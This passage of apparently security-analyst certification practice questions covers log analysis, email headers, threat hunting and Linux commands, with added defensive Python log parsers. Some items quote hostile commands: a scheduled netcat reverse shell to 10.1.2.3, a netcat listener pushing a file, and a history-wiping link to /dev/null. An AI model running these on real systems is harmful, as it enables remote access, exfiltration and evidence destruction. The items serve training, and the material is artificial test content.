    2. Checking currently running processes with the word apache2 and root both appearing in the output of ps.
    3. Shutting down all apache2 processes run by root.
    4. There is not enough information to answer this question.
  108. While reviewing email headers, Saanvi notices an entry that reads as follows:

    From: "John Smith, CIO" <…@example.com> with a Received: parameter that shows mail.demo.com [10.74.19.11].

    Which of the following scenarios is most likely if demo.com is not a domain belonging to the same owner as example.com?

    1. John Smith's email was forwarded by someone at demo.com.
    2. John Smith's email was sent to someone at demo.com.
    3. The headers were forged to make it appear to have come from John Smith.
    4. The mail.demo.com server is a trusted email forwarding partner for example.com.
  109. Fiona wants to prevent email impersonation of individuals inside her company. What technology can best help prevent this?
    1. IMAP
    2. SPF
    3. DKIM
    4. DMARC
  110. Which of the items from the following list is not typically found in an email header?
    1. Sender IP address
    2. Date
    3. Receiver IP address
    4. Private key
  111. Ian wants to leverage multiple threat flows and is frustrated that they come in different formats. What type of tool might best assist him in combining this information and using it to further streamline his operations?
    1. IPS
    2. OCSP
    3. SOAR
    4. SAML
  112. Cassandra is classifying a threat actor, and she describes the actor as wanting to steal nuclear research data. What term best describes this information?
    1. An alias
    2. A goal
    3. Their sophistication
    4. Their resource level
  113. During a log review, Mei sees repeated firewall entries, as shown here:
    Sep 16 2019 23:01:37: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
    Sep 16 2019 23:01:38: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
    Sep 16 2019 23:01:39: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
    Sep 16 2019 23:01:40: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
    

    What service is the remote system most likely attempting to access?

    1. H.323
    2. SNMP
    3. MS-SQL
    4. Oracle
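
    As an added worked example (it is not part of the original question set), the following Python parses %ASA-4-106023 deny messages in the layout shown above and aggregates repeated denies by source, destination, protocol and destination port, so the analyst can see which port is being hit and then look up the service behind it. The entries in SAMPLE_ASA_LOG are constructed for this example; the regular expression assumes the standard ASA 106023 message format used in the question.

```python
import re
from collections import Counter, defaultdict

# Constructed sample entries modelled on the %ASA-4-106023 format shown in the
# question; they are not taken from a live firewall.
SAMPLE_ASA_LOG = """\
Sep 16 2019 23:01:37: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:38: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:39: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:40: %ASA-4-106023: Deny udp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:41: %ASA-4-106023: Deny tcp src outside:10.10.0.55/40000 dst inside:192.168.1.20/443 by access-group "OUTSIDE" [0x5063b82f, 0x0]
"""

# Fields of a 106023 message: protocol, source interface:ip/port,
# destination interface:ip/port and the ACL that denied the packet.
DENY_RE = re.compile(
    r"%ASA-\d-106023: Deny (?P<proto>\w+) "
    r"src (?P<src_if>\w+):(?P<src_ip>[\d.]+)/(?P<src_port>\d+) "
    r"dst (?P<dst_if>\w+):(?P<dst_ip>[\d.]+)/(?P<dst_port>\d+) "
    r'by access-group "(?P<acl>[^"]+)"'
)


def parse_denies(log_text):
    """Return one dict per 106023 line; lines in any other format are skipped."""
    events = []
    for line in log_text.splitlines():
        m = DENY_RE.search(line)
        if m:
            e = m.groupdict()
            e["src_port"] = int(e["src_port"])
            e["dst_port"] = int(e["dst_port"])
            events.append(e)
    return events


def _target_key(e):
    # One "target" is a source host trying to reach one service on one host.
    return (e["src_ip"], e["dst_ip"], e["proto"], e["dst_port"])


def repeated_denies(events, min_hits=3):
    """Targets denied at least min_hits times: {(src, dst, proto, dst_port): count}."""
    hits = Counter(_target_key(e) for e in events)
    return {k: n for k, n in hits.items() if n >= min_hits}


def source_ports(events):
    """Distinct client source ports seen per target; one port across many denies
    usually means a single blocked connection being retransmitted."""
    ports = defaultdict(set)
    for e in events:
        ports[_target_key(e)].add(e["src_port"])
    return dict(ports)


if __name__ == "__main__":
    evts = parse_denies(SAMPLE_ASA_LOG)
    for target, n in repeated_denies(evts).items():
        src, dst, proto, port = target
        print(f"{src} -> {dst} {proto}/{port}: {n} denies, "
              f"source ports {sorted(source_ports(evts)[target])}")
```

    In the sample, the three denied TCP attempts all carry the same source port, 53534. A client retransmitting one blocked SYN looks exactly like this, whereas a scanner or brute-force tool normally opens a new socket, and therefore a new source port, for each attempt, so source-port diversity is worth reporting next to the hit count before deciding whether this is hostile.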
  114. While analyzing a malware file that she discovered, Tracy finds an encoded file that she believes is the primary binary in the malware package. Which of the following is not a type of tool that the malware writers may have used to obfuscate the code?
    1. A packer
    2. A crypter
    3. A shuffler
    4. A protector
  115. While reviewing Apache logs, Nara sees the following entries as well as hundreds of others from the same source IP address. What should Nara report has occurred?
    [ 21/Jul/2019:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
    [ 21/Jul/2019:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
    [ 21/Jul/2019:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
    [ 21/Jul/2019:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
    [ 21/Jul/2019:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
    [ 21/Jul/2019:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
    
    1. A denial-of-service attack
    2. A vulnerability scan
    3. A port scan
    4. A directory traversal attack
  116. Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where in the following image should she add a rule intended to block this type of traffic?
    Network diagram (image): Internet, firewall, router, Layer 3 distribution switch, and Windows 2019 server.
    1. The firewall
    2. The router
    3. The distribution switch
    4. The Windows 2019 server
  117. Cormac needs to lock down a Windows workstation that has recently been scanned using Nmap on a Kali Linux–based system, with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system's firewall for externally initiated connections?
    Nmap scan output (image).
    1. 80, 135, 139, and 445.
    2. 80, 445, and 3389.
    3. 135, 139, and 445.
    4. No ports should be open.
  118. Frank's team uses the following query to identify events in their threat intelligence tool. Why would this scenario be of concern to the security team?
    select * from network-events where data.process.image.file = 'cmd.exe' AND data.process.parentImage.file != 'explorer.exe' AND data.process.action = 'launch'
    
    1. Processes other than explorer.exe typically do not launch command prompts.
    2. cmd.exe should never launch explorer.exe.
    3. explorer.exe provides administrative access to systems.
    4. cmd.exe runs as administrator by default when launched outside of Explorer.
  119. Mark writes a script to pull data from his security data repository. The script includes the following query:
    select source.name, data.process.cmd, count(*) AS hostcount
    from windows-events where type = 'sysmon' AND
    data.process.action = 'launch' AND data.process.image.file =
    'reg.exe' AND data.process.parentImage.file = 'cmd.exe'
    

    He then queries the returned data using the following script:

    select source.name, data.process.cmd, count(*) AS hostcount
    from network-events where type = 'sysmon' AND
    data.process.action = 'launch' AND data.process.image.file =
    'cmd.exe' AND data.process.parentImage.file = 'explorer.exe'
    

    What events will Mark see?

    1. Uses of explorer.exe where it is launched by cmd.exe
    2. Registry edits launched via the command line from Explorer
    3. Registry edits launched via explorer.exe that modify cmd.exe
    4. Uses of cmd.exe where it is launched by reg.exe
  120. Mateo is responsible for hardening systems on his network, and he discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?
    1. Enable host firewalls.
    2. Install patches for those services.
    3. Turn off the services for each appliance.
    4. Place a network firewall between the devices and the rest of the network.
  121. Deepa wants to see the memory utilization for multiple Linux processes all at once. What command should she run?
    1. top
    2. ls -mem
    3. mem
    4. memstat

    Use the following scenario and image to answer questions 122–124.

    While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop to see a graphical representation of system resource usage. She sees the information shown in the following image:

    htop output showing resource usage for multiple Linux processes (image).
  122. What issue should Amanda report to the system administrator?
    1. High network utilization
    2. High memory utilization
    3. Insufficient swap space
    4. High CPU utilization
  123. What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop?
    1. ps
    2. top
    3. proc
    4. load
  124. What command can Amanda use to terminate the process?
    1. term
    2. stop
    3. end
    4. kill
  125. While reviewing output from the netstat command, John sees the following output. What should his next action be?
    [minesweeper.exe]
      TCP    127.0.0.1:62522        dynamo:0             LISTENING
    [minesweeper.exe]
      TCP    192.168.1.100          151.101.2.69:https   ESTABLISHED
    
    1. Capture traffic to 151.101.2.69 using Wireshark.
    2. Initiate the organization's incident response plan.
    3. Check to see if 151.101.2.69 is a valid Microsoft address.
    4. Ignore it; this is a false positive.
  126. What does EDR use to capture data for analysis and storage in a central database?
    1. A network tap
    2. Network flows
    3. Software agents
    4. Hardware agents
  127. While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured:
    ln /dev/null ~/.bash_history
    

    What action was this user attempting to perform?

    1. Enabling the Bash history
    2. Appending the contents of /dev/null to the Bash history
    3. Logging all shell commands to /dev/null
    4. Allowing remote access from the null shell
  128. Charles wants to determine whether a message he received was forwarded by analyzing the headers of the message. How can he determine this?
    1. Reviewing the Message-ID to see if it has been incremented.
    2. Checking for the In-Reply-To field.
    3. Checking for the References field.
    4. You cannot determine if a message was forwarded by analyzing the headers.
  129. While reviewing the filesystem of a potentially compromised system, Marta sees the following output when running ls -la. What should her next action be after seeing this?
    ls -la output (image).
    1. Continue to search for other changes.
    2. Run diff against the password file.
    3. Immediately change her password.
    4. Check the passwd binary against a known good version.
  130. Susan wants to check a Windows system for unusual behavior. Which of the following persistence techniques is not commonly used for legitimate purposes?
    1. Scheduled tasks
    2. Service replacement
    3. Service creation
    4. Autostart registry keys
  131. Matt is reviewing a query that his team wrote for their threat-hunting process. What will the following query warn them about?
    select timeInterval(date, '4h'), `data.login.user`,
    count(distinct data.login.machine.name) as machinecount from
    network-events where data.winevent.EventID = 4624 having
    machinecount > 1
    
    1. Users who log in more than once a day
    2. Users who are logged in to more than one machine within four hours
    3. Users who do not log in for more than four hours
    4. Users who do not log in to more than one machine in four hours
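
    Added example (not from the original question set): the windowed distinct-count logic of the query above, written in Python over constructed Windows logon events so it can be run offline. Event ID 4624 is the Windows successful-logon event; the event records themselves, the user names and the machine names are made up for this example. The second function shows the same check with a sliding window, which catches pairs of logons that a fixed four-hour bucket boundary splits apart.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed logon records (not real telemetry). EventID 4624 = successful
# logon; the 4625 (failed logon) record is included to show it is ignored.
EVENTS = [
    {"time": "2024-03-01T08:05:00", "EventID": 4624, "user": "alice", "machine": "WS-ALICE"},
    {"time": "2024-03-01T09:10:00", "EventID": 4624, "user": "alice", "machine": "FILESRV01"},
    {"time": "2024-03-01T09:15:00", "EventID": 4625, "user": "alice", "machine": "DC01"},
    {"time": "2024-03-01T11:50:00", "EventID": 4624, "user": "bob", "machine": "WS-BOB"},
    {"time": "2024-03-01T12:10:00", "EventID": 4624, "user": "bob", "machine": "WS-BOB2"},
    {"time": "2024-03-01T10:00:00", "EventID": 4624, "user": "svc_backup", "machine": "FILESRV01"},
    {"time": "2024-03-01T10:00:05", "EventID": 4624, "user": "svc_backup", "machine": "FILESRV01"},
]


def time_bucket(ts, hours=4):
    """Floor an ISO timestamp to a fixed bucket, like timeInterval(date, '4h').
    `hours` is assumed to divide 24 evenly."""
    dt = datetime.fromisoformat(ts)
    return dt.replace(hour=dt.hour - dt.hour % hours, minute=0, second=0, microsecond=0)


def multi_machine_logons(events, hours=4, threshold=1):
    """Fixed buckets: {(bucket_start, user): [machines]} where a user has a
    successful logon to more than `threshold` distinct machines in one bucket."""
    seen = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4624:
            continue
        seen[(time_bucket(e["time"], hours), e["user"])].add(e["machine"])
    return {k: sorted(v) for k, v in seen.items() if len(v) > threshold}


def multi_machine_logons_sliding(events, hours=4, threshold=1):
    """Sliding window: every logon opens a window of `hours`, so a pair such as
    11:50 and 12:10 is caught even though fixed buckets put them in different bins."""
    window = timedelta(hours=hours)
    per_user = defaultdict(list)
    for e in events:
        if e.get("EventID") == 4624:
            per_user[e["user"]].append((datetime.fromisoformat(e["time"]), e["machine"]))
    flagged = {}
    for user, logons in per_user.items():
        logons.sort()
        for i, (start, _) in enumerate(logons):
            machines = {m for t, m in logons[i:] if t - start <= window}
            if len(machines) > threshold:
                flagged[user] = sorted(machines)
                break
    return flagged


if __name__ == "__main__":
    print("fixed buckets:", multi_machine_logons(EVENTS))
    print("sliding window:", multi_machine_logons_sliding(EVENTS))
```

    In production this rule needs tuning on the logon type recorded in the 4624 event: network logons (type 3) to file servers and domain controllers are normal for almost every user, so a hunt like this is usually restricted to interactive and remote-interactive logons, or to privileged accounts, before the machine count becomes meaningful.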
  132. Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?
    1. grep
    2. more
    3. less
    4. strings
  133. Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on:
    root       507  0.0  0.1 258268  3288 ?        Ssl  15:52   0:00 /usr/sbin/rsyslogd -n
    message+   508  0.0  0.2  44176  5160 ?        Ss   15:52   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
    root       523  0.0  0.3 281092  6312 ?        Ssl  15:52   0:00 /usr/lib/accountsservice/accounts-daemon
    root       524  0.0  0.7 389760 15956 ?        Ssl  15:52   0:00 /usr/sbin/NetworkManager --no-daemon
    root       527  0.0  0.1  28432  2992 ?        Ss   15:52   0:00 /lib/systemd/systemd-logind
    apache      714  0.0  0.1  27416  2748 ?        Ss   15:52   0:00 /www/temp/webmin
    root       617  0.0  0.1  19312  2056 ?        Ss   15:52   0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
    root       644  0.0  0.1 245472  2444 ?        Sl   15:52   0:01 /usr/sbin/VBoxService
    root       653  0.0  0.0  12828  1848 tty1     Ss+  15:52   0:00 /sbin/agetty --noclear tty1 linux
    root       661  0.0  0.3 285428  8088 ?        Ssl  15:52   0:00 /usr/lib/policykit-1/polkitd --no-debug
    root       663  0.0  0.3 364752  7600 ?        Ssl  15:52   0:00 /usr/sbin/gdm3
    root       846  0.0  0.5 285816 10884 ?        Ssl  15:53   0:00 /usr/lib/upower/upowerd
    root       867  0.0  0.3 235180  7272 ?        Sl   15:53   0:00 gdm-session-worker [pam/gdm-launch-environment]
    Debian-+   877  0.0  0.2  46892  4816 ?        Ss   15:53   0:00 /lib/systemd/systemd --user
    Debian-+   878  0.0  0.0  62672  1596 ?        S    15:53   0:00 (sd-pam)
    
    1. 508
    2. 617
    3. 846
    4. 714
  134. Damian has discovered that systems throughout his organization have been compromised for more than a year by an attacker with significant resources and technology. After a month of attempting to fully remove the intrusion, his organization is still finding signs of compromise despite their best efforts. How would Damian best categorize this threat actor?
    1. Criminal
    2. Hacktivist
    3. APT
    4. Unknown
  135. While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred?
    root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
    > daemon:*:16820:0:99999:7:::
    > bin:*:16820:0:99999:7:::
    > sys:*:16820:0:99999:7:::
    > sync:*:16820:0:99999:7:::
    > games:*:16820:0:99999:7:::
    > man:*:16820:0:99999:7:::
    > lp:*:16820:0:99999:7:::
    > mail:*:16820:0:99999:7:::
    > news:*:16820:0:99999:7:::
    > uucp:*:16820:0:99999:7:::
    > proxy:*:16820:0:99999:7:::
    > www-data:*:16820:0:99999:7:::
    > backup:*:16820:0:99999:7:::
    > list:*:16820:0:99999:7:::
    > irc:*:16820:0:99999:7:::
    
    1. The root account has been compromised.
    2. An account named daemon has been added.
    3. The shadow password file has been modified.
    4. /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.
  136. Bruce wants to integrate a security system to his SOAR. The security system provides real-time query capabilities, and Bruce wants to take advantage of this to provide up-to-the-moment data for his SOAR tool. What type of integration is best suited to this?
    1. CSV
    2. Flat file
    3. API
    4. Email
  137. Carol wants to analyze email as part of her antispam and antiphishing measures. Which of the following is least likely to show signs of phishing or other email-based attacks?
    1. The email's headers
    2. Embedded links in the email
    3. Attachments to the email
    4. The email signature block
  138. Juliette wants to decrease the risk of embedded links in email. Which of the following solutions is the most common method for doing this?
    1. Removing all links in email
    2. Redirecting links in email to a proxy
    3. Scanning all email using an antimalware tool
    4. Using a DNS blackhole and IP reputation list
  139. James wants to use an automated malware signature creation tool. What type of environment do tools like this unpack and run the malware in?
    1. A sandbox
    2. A physical machine
    3. A container
    4. A DMARC
  140. Luis discovers the following entries in /var/log/auth.log. What is most likely occurring?
    Aug  6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
    Aug  6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
    Aug  6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
    Aug  6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
    Aug  6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
    Aug  6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
    Aug  6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
    Aug  6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
    Aug  6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
    Aug  6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
    
    1. A user has forgotten their password.
    2. A brute-force attack against the root account.
    3. A misconfigured service.
    4. A denial-of-service attack against the root account.
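
    Added example, not part of the original question set: a small detector for the pattern in the auth.log excerpt above. It parses sshd "Failed password" lines, counts failures per source IP and target account inside a sliding time window, and also reports how many distinct accounts each source has tried, which separates a single-account attack from password spraying. The log lines in SAMPLE_AUTH_LOG are constructed for this example and mimic the format shown in the question; because syslog timestamps carry no year, the year is supplied as a parameter.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log lines in the sshd format shown in the question; the
# "Accepted publickey" line and the single failures for other accounts are
# there to show what the detector ignores.
SAMPLE_AUTH_LOG = """\
Aug  6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug  6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug  6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug  6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug  6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug  6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
Aug  6 14:13:01 demo sshd[5305]: Failed password for invalid user admin from 10.11.34.11 port 38480 ssh2
Aug  6 14:13:02 demo sshd[5310]: Accepted publickey for deploy from 10.11.34.50 port 51000 ssh2: ED25519 SHA256:abc
Aug  6 14:20:00 demo sshd[5400]: Failed password for alice from 192.0.2.7 port 40000 ssh2
Aug  6 14:20:30 demo sshd[5401]: Failed password for alice from 192.0.2.7 port 40001 ssh2
"""

# sshd writes "invalid user <name>" when the account does not exist at all.
FAILED_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_failures(log_text, year=2019):
    """Return [(timestamp, source_ip, account)] for every failed-password line.
    `year` is an assumption: syslog timestamps do not include one."""
    failures = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        failures.append((ts, m["ip"], m["user"]))
    return failures


def brute_force_sources(log_text, threshold=5, window=timedelta(seconds=60)):
    """{(ip, account): total_failures} for pairs with at least `threshold`
    failures inside any `window`-long span (sliding window over sorted times)."""
    by_key = defaultdict(list)
    for ts, ip, user in parse_failures(log_text):
        by_key[(ip, user)].append(ts)
    flagged = {}
    for key, times in by_key.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[key] = len(times)
                break
    return flagged


def accounts_per_source(log_text):
    """{ip: {accounts tried}}: many accounts from one source suggests spraying."""
    tried = defaultdict(set)
    for _, ip, user in parse_failures(log_text):
        tried[ip].add(user)
    return dict(tried)


if __name__ == "__main__":
    for (ip, user), n in brute_force_sources(SAMPLE_AUTH_LOG).items():
        print(f"{ip} -> {user}: {n} failures, accounts tried: "
              f"{sorted(accounts_per_source(SAMPLE_AUTH_LOG)[ip])}")
```

    The two failures for alice from 192.0.2.7 fall under the threshold and are left alone, which is the behaviour you want for a user mistyping a password; tools such as fail2ban implement the same count-in-a-window logic and add a temporary firewall block as the automated response.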
  141. Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH?
    1. Add an iptables rule blocking root logins.
    2. Add root to the sudoers group.
    3. Change sshd_config to deny root login.
    4. Add a network IPS rule to block root logins.
  142. Azra's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command:
    at \\workstation10 20:30 /every:F nc -nv 10.1.2.3 443 -e cmd.exe
    

    What does it do?

    1. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30 p.m.
    2. It uses the AT command to dial a remote host via NetBIOS.
    3. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30 p.m.
    4. It creates a VPN connection to 10.1.2.3 every five days at 8:30 p.m. GST.
  143. While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:
    Aug  6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
    Aug  6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6 > 3
    Aug  6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
    Aug  6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
    Aug  6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]
    

    Which of the following has not occurred?

    1. A user has attempted to reauthenticate too many times.
    2. PAM is configured for three retries and will reject any additional retries in the same session.
    3. Fail2ban has blocked the SSH login attempts.
    4. Root is attempting to log in via SSH from the local host.
  144. Naomi wants to analyze malware by running it and capturing what it does. What type of tool should she use?
    1. A containerization tool
    2. A virtualization tool
    3. A sandbox tool
    4. A packet analyzer
  145. While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command:
    nc -l -p 43501 < example.zip
    

    What happened?

    1. The user set up a reverse shell running as example.zip.
    2. The user set up netcat as a listener to push example.zip.
    3. The user set up a remote shell running as example.zip.
    4. The user set up netcat to receive example.zip.
  146. Susan is hunting threats and performs the following query against her database of event logs. What type of threat is she looking for?
    select source.name, destination.name, count(*) from network-events where destination.port = '3389'
    
    1. SSH
    2. MySQL
    3. RDP
    4. IRC
  147. Lukas wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Lukas accomplish this for Windows workstations?
    1. Using application allowlisting to prevent all prohibited programs from running.
    2. Using Windows Defender and adding the game to the blocklist file.
    3. Listing it in the Blocked Programs list via secpol.msc.
    4. You cannot blocklist applications in Windows 10 without a third-party application.
  148. Ian lists the permissions for a Linux file that he believes may have been modified by an attacker. What do the permissions shown here mean?
    -rwxrw-r-- 1 chuck       admingroup      1232 Feb 28 16:22 myfile.txt
    
    1. User chuck has read and write rights to the file; the Administrators group has read, write, and execute rights; and all other users only have read rights.
    2. User admingroup has read rights; group chuck has read and write rights; and all users on the system can read, write, and execute the file.
    3. User chuck has read, write, and execute rights on the file. Members of admingroup group can read and write to the file but cannot execute it, and all users on the system can read the file.
    4. User admingroup has read, write, and execute rights on the file; user chuck has read and write rights; and all other users have read rights to the file.
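
    Added example (it is not part of the original question set): a decoder for ls -l mode strings such as the one above. It splits the nine permission characters into user, group and others, derives the octal mode, and flags the setuid, setgid and sticky bits, which are what an analyst checks first on a binary suspected of being replaced. The ls -l lines fed to it here are constructed for this example; the trailing "." or "+" that some ls builds append for SELinux contexts or ACLs is accepted and ignored.

```python
import re

# Type character, nine permission characters, optional ACL/SELinux marker.
PERM_RE = re.compile(r"^(?P<type>[-dlcbps])(?P<bits>[rwxsStT-]{9})[.+]?$")

FILE_TYPES = {"-": "file", "d": "directory", "l": "symlink", "c": "char device",
              "b": "block device", "p": "fifo", "s": "socket"}


def decode_mode(mode_str):
    """Decode an ls -l mode string ('-rwxrw-r--', '-rwsr-xr-x', ...) into
    per-class permissions, the octal mode and the special bits."""
    m = PERM_RE.match(mode_str)
    if not m:
        raise ValueError(f"not an ls -l mode string: {mode_str!r}")
    bits = m["bits"]
    perms = {}
    octal = 0      # accumulated rwx digits, built base 8
    special = 0    # setuid=4, setgid=2, sticky=1
    for i, who in enumerate(("user", "group", "others")):
        r, w, x = bits[3 * i: 3 * i + 3]
        # lower-case s/t means the special bit AND execute are set;
        # upper-case S/T means the special bit is set without execute.
        execute = x in "xst"
        perms[who] = {"read": r == "r", "write": w == "w", "execute": execute}
        octal = octal * 8 + (4 if r == "r" else 0) + (2 if w == "w" else 0) + (1 if execute else 0)
        if x in "sS":
            special |= 4 >> i          # user slot -> setuid (4), group slot -> setgid (2)
        elif x in "tT":
            special |= 1               # others slot -> sticky
    return {
        "type": FILE_TYPES[m["type"]],
        "perms": perms,
        "octal": f"{special}{octal:03o}",
        "setuid": bool(special & 4),
        "setgid": bool(special & 2),
        "sticky": bool(special & 1),
    }


def describe_ls_line(line):
    """Split one `ls -l` line (mode links owner group size month day time name)
    and decode its mode. Names containing spaces stay intact via maxsplit=8."""
    parts = line.split(None, 8)
    if len(parts) != 9:
        raise ValueError(f"unexpected ls -l layout: {line!r}")
    mode, links, owner, group, size, _mon, _day, _time, name = parts
    info = decode_mode(mode)
    info.update(links=int(links), owner=owner, group=group, size=int(size), name=name)
    return info


if __name__ == "__main__":
    # Constructed ls -l lines for demonstration.
    for sample in (
        "-rwxrw-r-- 1 chuck admingroup 1232 Feb 28 16:22 myfile.txt",
        "-rwsr-xr-x 1 root root 59976 Feb  6 2020 /usr/bin/passwd",
    ):
        info = describe_ls_line(sample)
        print(f"{info['name']}: {info['octal']} owner={info['owner']} "
              f"group={info['group']} setuid={info['setuid']}")
```

    A setuid bit on a binary that is not normally setuid, or an octal mode that differs from what the package manager recorded (for example, dpkg --verify or rpm -V), is a stronger indicator than the owner and group alone, since an attacker who replaces a file usually preserves the original ownership.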
  149. While reviewing web server logs, Danielle notices the following entry. What occurred?
    10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme=total 200
    
    1. A theme was changed.
    2. A file was not found.
    3. An attempt to edit the 404 page.
    4. The 404 page was displayed.
  150. Melissa wants to deploy a tool to coordinate information from a wide range of platforms so that she can see it in a central location and then automate responses as part of security workflows. What type of tool should she deploy?
    1. UEBA
    2. SOAR
    3. SIEM
    4. MDR
  151. While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?
    Wireshark capture showing an extended ESP session (image).
    1. An encrypted RAT
    2. A VPN application
    3. A secure web browser
    4. A base64-encoded packet transfer utility
  152. While reviewing indicators of compromise, Dustin notices that notepad.exe has opened a listener port on the Windows machine he is investigating. What is this an example of?
    1. Anomalous behavior
    2. Heuristic behavior
    3. Entity behavior
    4. Known-good behavior
  153. How does data enrichment differ from threat feed combination?
    1. Data enrichment is a form of threat feed combination for security insights, focuses on adding more threat feeds together for a full picture, and removes third-party data to focus on core data elements rather than adding together multiple data sources.
    2. Data enrichment uses events and nonevent information to improve security insights, instead of just combining threat information.
    3. Threat feed combination is more useful than data enrichment because of its focus on only the threats.
    4. Threat feed combination techniques are mature, and data enrichment is not ready for enterprise use.
  154. Which of the following capabilities is not a typical part of a SIEM system?
    1. Alerting
    2. Performance management
    3. Data aggregation
    4. Log retention
  155. Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?
    1. Use sha1sum to generate a hash for the file and write a script to check it periodically.
    2. Install and use Tripwire.
    3. Periodically check the MAC information for the file using a script.
    4. Encrypt the file and keep the key secret so the file cannot be modified.
